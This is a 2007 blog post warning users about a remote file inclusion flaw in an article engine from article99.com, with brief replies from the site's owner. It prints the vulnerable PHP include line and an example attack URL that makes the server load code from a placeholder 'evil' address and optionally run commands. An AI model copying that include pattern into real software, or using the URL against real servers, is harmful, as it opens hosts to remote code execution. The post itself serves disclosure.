jump to navigation

Article99.com article engine flaw February 9, 2007

It has been a few months since I installed a downloaded article engine from article99.com. But few days after I installed the program, my server started to get overloaded most of the times. I haven’t got a clue during the first few days, but I ended up suspending the account where I installed the article engine. Fortunately the problem stopped.

From out of my curiosity, I made the site avtive again when I got back I january to see if the problem will return, well it did returned and caused the server to become un responsive for quite several times. Of course the issue caused some of the websites running on the same server to be in the same trouble. But since I can’t just give up looking for a solution, i tried to trace the issue myself and found that someone who have enough knowledge can actually execute a remote code on the server. Fortunately the attacked wasn’t been able to get hold of the server.

But for sake of those who are trying to install the same server on your end, be cautious. Although I think article99.com has gone offline and let their domain expire, probably due to this issue.

How is this possible? A remote user can actually execute a remove code on the server using the insecure script through a GET method.

i never was actually aware how powerful this code

<?php

include($_GET[“page”] . “.php”);

?>

is when left that way.

the actual url should look like

http://www.domain.com/index.php?page=urloftheevilcode?&cmd=commands…

the &cmd= part is actually optional, since once you are able to execute the remote code, everything can be manipulated there in itself.

Comments»

1. smartads - February 23, 2007

Hello Randy,

Thanks for the heads up. I’ve discontinued the feed until this problem is fixed.

2. Randy - February 23, 2007

great! good luck! give me a heads up when your back online 🙂

3. smartads - February 27, 2007

Hello Randy,

I’m glad you braught this subject to my attention. Turns out that mySQL database wasn’t optimized properly to take on such a load. I got a great tutorial from http://www.vbulletin.com/forum/showthread.php?threadid=62913 about optimizing the “my.cnf” file. What a huge difference.

Please let me know what xml feed, for what category you wish to use.

Sincerely,

Martin Lemieux
Article99.com Owner